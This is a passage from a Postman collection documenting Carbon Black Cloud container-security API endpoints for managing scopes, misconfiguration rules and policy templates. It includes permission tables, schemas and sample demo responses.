\"&lt;string&gt;\"\n    },\n    \"lifecycle_phase\": \"&lt;string&gt;\",\n    \"workload_count\": &lt;integer&gt;\n  }\n]\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","policies_scopes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"59e9ae3c-5e90-4574-a0b3-3972eaa76ccd","name":"Get Scopes With Policies","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies_scopes"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 03 May 2023 03:40:59 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"102105bf-0b91-4412-93fb-899a0e77ef29"}],"cookie":[],"responseTime":null,"body":"{\n    \"items\": [\n        {\n            \"scope_id\": \"any-scope-id\",\n            \"name\": \"Any\",\n            \"policy_metadata\": {\n                \"policy_id\": \"123a4b56-520f-411a-a146-3be26dfbbdbd\",\n                \"policy_name\": \"default\"\n            },\n            \"workload_count\": 117,\n            \"lifecycle_phase\": \"deployed\"\n        },\n        {\n            \"scope_id\": \"123456a7-a607-4377-8ca3-d1020ad8fb85\",\n            \"name\": \"demo-scope\",\n            \"policy_metadata\": {\n                \"policy_id\": \"a123bc56-ce51-4569-94a1-defa909e1615\",\n                \"policy_name\": \"demo-policy\"\n            },\n            \"workload_count\": 33,\n            \"lifecycle_phase\": \"any\"\n        }\n    ]\n}"}],"_postman_id":"7a039bef-d7d4-4f76-a6ce-6e7c8f0519da"},{"name":"Create or Update Scope","id":"b948c760-51ec-4299-b059-3230bfe3010e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"scope_id\": \"12a3bc4d-ee56-7f8g-a11b-2345cd67e89e\",\n    \"name\": \"Updated Demo Scope 01\",\n    \"lifecycle_phase\": \"build\",\n    \"clusters\": [\n        \"demo:cluster\"\n    ],\n    \"clusters_groups\": [],\n    \"namespaces\": [\n        \"*\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/scopes","description":"<p>Use this request to create or update a scope.  </p>\n<p>Scopes are used to in order to define a list of resources we want to track.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>CREATE, UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"scope_id\": \"&lt;uuid&gt;\",\n  \"scope_name\": \"&lt;string&gt;\",\n  \"creator\": \"&lt;email&gt;\",\n  \"created_on\": &lt;number&gt;,\n  \"modified_by\": \"&lt;string&gt;\",\n  \"modified_on\": &lt;number&gt;,\n  \"is_protected\": &lt;boolean&gt;,\n  \"lifecycle_phase\": \"&lt;string&gt;\",\n  \"clusters_groups\": [\n    \"&lt;string&gt;\"\n  ],\n  \"clusters\": [\n    \"&lt;string&gt;\"\n  ],\n  \"namespaces\": [\n    \"&lt;string&gt;\"\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","scopes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"9d27e688-fa84-42c8-baa9-6b34791af3e8","name":"Create Scope","originalRequest":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"Demo Scope 01\",\n    \"lifecycle_phase\": \"build\",\n    \"clusters\": [\n        \"demo:cluster\"\n    ],\n    \"clusters_groups\": [],\n    \"namespaces\": [\n        \"*\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/scopes"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 04 May 2023 04:22:33 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"96"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"52fb59ba-7670-450a-9b2f-d00fa6902f72"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"12a3bc4d-ee56-7f8g-a11b-2345cd67e89e\",\n    \"scope_id\": \"12a3bc4d-ee56-7f8g-a11b-2345cd67e89e\"\n}"},{"id":"41b1ac7a-b72a-486a-97d2-2a6cdeb6f536","name":"Update Scope","originalRequest":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"scope_id\": \"12a3bc4d-ee56-7f8g-a11b-2345cd67e89e\",\n    \"name\": \"Updated Demo Scope 01\",\n    \"lifecycle_phase\": \"build\",\n    \"clusters\": [\n        \"demo:cluster\"\n    ],\n    \"clusters_groups\": [],\n    \"namespaces\": [\n        \"*\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/scopes"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 04 May 2023 04:30:35 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"96"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"94ba66a4-6f8d-49c2-bf4c-596bb26fd640"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"12a3bc4d-ee56-7f8g-a11b-2345cd67e89e\",\n    \"scope_id\": \"12a3bc4d-ee56-7f8g-a11b-2345cd67e89e\"\n}"}],"_postman_id":"b948c760-51ec-4299-b059-3230bfe3010e"},{"name":"Delete Scope","id":"9719ac4c-9906-48fb-a8fc-8222bea207f2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/scopes/{{cb_container_scope_id}}","description":"<p>This request deletes the scope object for a provided scope id.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","scopes","{{cb_container_scope_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[{"id":"4c23c4b3-25cf-4db2-8d37-bdac61930242","type":"any","value":"<uuid>","key":"scopeId"}]}},"response":[],"_postman_id":"9719ac4c-9906-48fb-a8fc-8222bea207f2"}],"id":"a3b620c1-d569-46a0-9280-e3f0abb0460a","_postman_id":"a3b620c1-d569-46a0-9280-e3f0abb0460a","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Rules","item":[{"name":"Get All Rules","id":"90277b3a-58b6-4ef0-ac8f-6d80c564092c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/rules","description":"<p>This request returns the list of misconfiguration types (rules) that can be added to a policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"rules\": {\n    \"rule_id1\": {\n      \"rule_id\": \"&lt;uuid&gt;\",\n      \"name\": \"&lt;string&gt;\",\n      \"description\": \"&lt;string&gt;\",\n      \"risk\": \"&lt;string&gt;\",\n      \"supported_actions\": [\n        \"&lt;string&gt;\"\n      ],\n      \"preset_support\": {\n        \"is_required\": &lt;boolean&gt;,\n        \"default_settings\": {\n          \"name\": \"&lt;string&gt;\",\n          \"security_settings\": [\n            {\n              \"path\": \"&lt;string&gt;\",\n              \"action\": \"&lt;string&gt;\",\n              \"value\": {\n                \"nullable\": true,\n                \"description\": \"&lt;string&gt;\"\n              }\n            },\n            {\n              \"path\": \"&lt;string&gt;\",\n              \"action\": \"&lt;string&gt;\",\n              \"value\": {\n                \"nullable\": &lt;boolean&gt;,\n                \"description\": \"&lt;string&gt;\"\n              }\n            }\n          ]\n        },\n        \"security_settings\": [\n          {\n            \"path\": \"&lt;string&gt;\",\n            \"supported_actions\": [\n              \"&lt;string&gt;\"\n            ]\n          },\n          {\n            \"path\": \"&lt;string&gt;\",\n            \"supported_actions\": [\n              \"&lt;string&gt;\"\n            ]\n          }\n        ]\n      },\n      \"presets\": [\n        {\n          \"id\": \"&lt;string&gt;\",\n          \"name\": \"&lt;string&gt;\",\n          \"rule_id\": \"&lt;string&gt;\",\n          \"policies\": [\n            {\n              \"policy_id\": \"&lt;uuid&gt;\",\n              \"policy_name\": \"&lt;string&gt;\"\n            },\n            {\n              \"policy_id\": \"&lt;uuid&gt;\",\n              \"policy_name\": \"&lt;string&gt;\"\n            }\n          ],\n          \"security_settings\": [\n            {\n              \"path\": \"&lt;string&gt;\",\n              \"action\": \"&lt;string&gt;\",\n              \"value\": {\n                \"nullable\": &lt;boolean&gt;,\n                \"description\": \"&lt;string&gt;\"\n              }\n            },\n            {\n              \"path\": \"&lt;string&gt;\",\n              \"action\": \"&lt;string&gt;\",\n              \"value\": {\n                \"nullable\": &lt;boolean&gt;,\n                \"description\": \"&lt;string&gt;\"\n              }\n            }\n          ]\n        }\n      ],\n      \"category\": \"Workload Security\",\n      \"policies\": [\n        {\n          \"policy_id\": \"&lt;uuid&gt;\",\n          \"policy_name\": \"&lt;string&gt;\"\n        }\n      ],\n      \"templates\": [\n        {\n          \"template_id\": \"&lt;uuid&gt;\",\n          \"template_name\": \"&lt;string&gt;\"\n        }\n      ],\n      \"custom_rules_metadata\": {\n        \"kinds\": [\n          \"&lt;string&gt;\"\n        ],\n        \"creator\": \"&lt;string&gt;\",\n        \"created_on\": &lt;number&gt;,\n        \"created_on_iso\": \"&lt;string&gt;\",\n        \"type\": \"advanced\",\n        \"mapl_rule\": {\n          \"aliquipdc\": \"&lt;string&gt;\",\n          \"mollit_\": \"&lt;string&gt;\"\n        }\n      }\n    }\n  }\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","rules"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"b6d74b20-46ee-4fe8-8987-ce387699ce0d","name":"Get All Rules","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/rules"},"status":"OK","code":200,"_postman_previewlanguage":"Text","header":[{"key":"Date","value":"Wed, 10 May 2023 03:12:27 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"d4609420-74fd-4d4f-af60-44e2a6008d8c"}],"cookie":[],"responseTime":null,"body":"{\n    \"rules\": {\n        \"09c851ee-46f8-4d18-847f-c0df4446472c\": {\n            \"rule_id\": \"09c851ee-46f8-4d18-847f-c0df4446472c\",\n            \"name\": \"Demo Rule  01\",\n            \"description\": \"Creating a junk rule\",\n            \"risk\": null,\n            \"category\": \"Container Images\",\n            \"supported_actions\": [\n                \"block\",\n                \"alert\"\n            ],\n            \"preset_support\": null,\n            \"presets\": null,\n            \"policies\": [],\n            \"templates\": [],\n            \"custom_rule_metadata\": {\n                \"mapl_rule\": {\n                    \"ruleID\": \"09c851ee-46f8-4d18-847f-c0df4446472c\",\n                    \"sender\": {},\n                    \"receiver\": {},\n                    \"resource\": {},\n                    \"conditions\": {\n                        \"conditionsTree\": {\n                            \"OR\": [\n                                {\n                                    \"ANY\": {\n                                        \"parentJsonpathAttribute\": \"jsonpath:$.containers[:]\",\n                                        \"returnValueJsonpath\": {\n                                            \"criticalVulnerabilities\": \"jsonpath:$RELATIVE.scanData.vulnerabilitiesBySeverity.critical\",\n                                            \"highVulnerabilities\": \"jsonpath:$RELATIVE.scanData.vulnerabilitiesBySeverity.high\",\n                                            \"image\": \"jsonpath:$RELATIVE.Container.image.full_tag\"\n                                        },\n                                        \"condition\": {\n                                            \"OR\": [\n                                                {\n                                                    \"condition\": {\n                                                        \"attribute\": \"jsonpath:$RELATIVE.imageVulnerabilitiesSummary.vulnerabilitiesSummary.critical.amount\",\n                                                        \"method\": \"GT\",\n                                                        \"value\": \"0\"\n                                                    }\n                                                },\n                                                {\n                                                    \"condition\": {\n                                                        \"attribute\": \"jsonpath:$RELATIVE.imageVulnerabilitiesSummary.vulnerabilitiesSummary.high.amount\",\n                                                        \"method\": \"GT\",\n                                                        \"value\": \"0\"\n                                                    }\n                                                }\n                                            ]\n                                        }\n                                    }\n                                },\n                                {\n                                    \"ANY\": {\n                                        \"parentJsonpathAttribute\": \"jsonpath:$.initContainers[:]\",\n                                        \"returnValueJsonpath\": {\n                                            \"criticalVulnerabilities\": \"jsonpath:$RELATIVE.scanData.vulnerabilitiesBySeverity.critical\",\n                                            \"highVulnerabilities\": \"jsonpath:$RELATIVE.scanData.vulnerabilitiesBySeverity.high\",\n                                            \"image\": \"jsonpath:$RELATIVE.Container.image.full_tag\"\n                                        },\n                                        \"condition\": {\n                                            \"OR\": [\n                                                {\n                                                    \"condition\": {\n                                                        \"attribute\": \"jsonpath:$RELATIVE.imageVulnerabilitiesSummary.vulnerabilitiesSummary.critical.amount\",\n                                                        \"method\": \"GT\",\n                                                        \"value\": \"0\"\n                                                    }\n                                                },\n                                                {\n                                                    \"condition\": {\n                                                        \"attribute\": \"jsonpath:$RELATIVE.imageVulnerabilitiesSummary.vulnerabilitiesSummary.high.amount\",\n                                                        \"method\": \"GT\",\n                                                        \"value\": \"0\"\n                                                    }\n                                                }\n                                            ]\n                                        }\n                                    }\n                                },\n                                {\n                                    \"ANY\": {\n                                        \"parentJsonpathAttribute\": \"jsonpath:$.ephemeralContainers[:]\",\n                                        \"returnValueJsonpath\": {\n                                            \"criticalVulnerabilities\": \"jsonpath:$RELATIVE.scanData.vulnerabilitiesBySeverity.critical\",\n                                            \"highVulnerabilities\": \"jsonpath:$RELATIVE.scanData.vulnerabilitiesBySeverity.high\",\n                                            \"image\": \"jsonpath:$RELATIVE.Container.image.full_tag\"\n                                        },\n                                        \"condition\": {\n                                            \"OR\": [\n                                                {\n                                                    \"condition\": {\n                                                        \"attribute\": \"jsonpath:$RELATIVE.imageVulnerabilitiesSummary.vulnerabilitiesSummary.critical.amount\",\n                                                        \"method\": \"GT\",\n                                                        \"value\": \"0\"\n                                                    }\n                                                },\n                                                {\n                                                    \"condition\": {\n                                                        \"attribute\": \"jsonpath:$RELATIVE.imageVulnerabilitiesSummary.vulnerabilitiesSummary.high.amount\",\n                                                        \"method\": \"GT\",\n                                                        \"value\": \"0\"\n                                                    }\n                                                }\n                                            ]\n                                        }\n                                    }\n                                }\n                            ]\n                        }\n                    },\n                    \"metadata\": {\n                        \"description\": \"Demonstration Rule\",\n                        \"initial-type\": \"critical-vulnerabilities\",\n                        \"name\": \"Demo Rule  01\"\n                    }\n                },\n                \"kinds\": [],\n                \"type\": \"image-scanning\",\n                \"creator\": \"demouser@demoorg.com\",\n                \"created_on\": 1683746762769,\n                \"created_on_iso\": \"2023-05-10T19:26:02.769Z\"\n            }\n        }\n    }\n}"}],"_postman_id":"90277b3a-58b6-4ef0-ac8f-6d80c564092c"},{"name":"Delete Custom Rule","id":"34bfb7a0-af93-43a3-96e6-cc69caf89eb5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"X-AUTH-TOKEN","value":"{{X-AUTH-TOKEN}}"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/rules/{{cb_container_rule_id}}","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","rules","{{cb_container_rule_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"34bfb7a0-af93-43a3-96e6-cc69caf89eb5"}],"id":"74030038-84df-4a34-9d58-2d15845f3a9b","_postman_id":"74030038-84df-4a34-9d58-2d15845f3a9b","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Templates","item":[{"name":"Get All Templates","id":"55f1a708-012c-4495-9778-24b055b264f8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/templates","description":"<p>This request returns the list of templates that can be used when creating policies.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"items\": [\n    {\n      \"template_id\": \"&lt;uuid&gt;\",\n      \"name\": \"&lt;string&gt;\",\n      \"rules\": [\n        {\n          \"id\": \"&lt;string&gt;\",\n          \"action\": \"&lt;string&gt;\"\n        }\n      ],\n      \"custom_template_metadata\": {\n        \"creator\": \"&lt;string&gt;\",\n        \"created_on_iso\": \"&lt;string&gt;\"\n      }\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","templates"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"bb38b269-36db-4ee5-b9d7-91f09c5187f3","name":"Get All Templates","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/templates"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 10 May 2023 19:48:15 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"f8803180-672d-463a-b275-9f34e1e6f18d"}],"cookie":[],"responseTime":null,"body":"{\n    \"items\": [\n        {\n            \"template_id\": \"cis-benchmark-1-6-0\",\n            \"name\": \"CiS benchmark 1.6.0\",\n            \"rules\": [\n                {\n                    \"id\": \"privileged\",\n                    \"action\": \"alert\"\n                },\n                {\n                    \"id\": \"privilege-escalation\",\n                    \"action\": \"alert\"\n                },\n                {\n                    \"id\": \"seccomp-profile\",\n                    \"action\": \"alert\"\n                },\n                {\n                    \"id\": \"additional-capabilities\",\n                    \"action\": \"alert\"\n                },\n                {\n                    \"id\": \"host-namespace\",\n                    \"action\": \"alert\"\n                },\n                {\n                    \"id\": \"cluster-role-binding\",\n                    \"action\": \"alert\"\n                }\n            ],\n            \"custom_template_metadata\": {\n                \"creator\": \"demouser@demoorg.com\",\n                \"created_on\": 1644579658878,\n                \"created_on_iso\": \"2022-02-11T11:40:58.878Z\"\n            }\n        }\n    ]\n}"}],"_postman_id":"55f1a708-012c-4495-9778-24b055b264f8"},{"name":"Create or Update a Template","id":"d530206c-ddf3-4595-9c87-df8ee05441b4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    //if template_id is null or empty create new template otherwise update\n    // \"template_id\": \"75f2315e-d6d9-4254-9f19-03001ff6fb02\",\n    \"name\": \"Demo Template Four\",\n    \"rules\": [\n        {\n            \"id\": \"demo_rule_three\",\n            \"action\": \"alert\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/templates","description":"<p>Create a new or update an existing template</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"template_id\": \"&lt;uuid&gt;\",\n  \"name\": \"&lt;string&gt;\",\n  \"rules\": [\n    {\n      \"id\": \"&lt;string&gt;\",\n      \"action\": \"alert\"\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","templates"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"528925af-0dbd-4984-881d-14e37ecdd822","name":"Create a Template","originalRequest":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"name\": \"Demo Template One\",\n  \"rules\": [\n    {\n      \"id\": \"demo_rule_one\",\n      \"action\": \"alert\"\n    }\n  ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/templates"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 10 May 2023 19:53:16 GMT"},{"key":"Content-Type","value":"application/json; 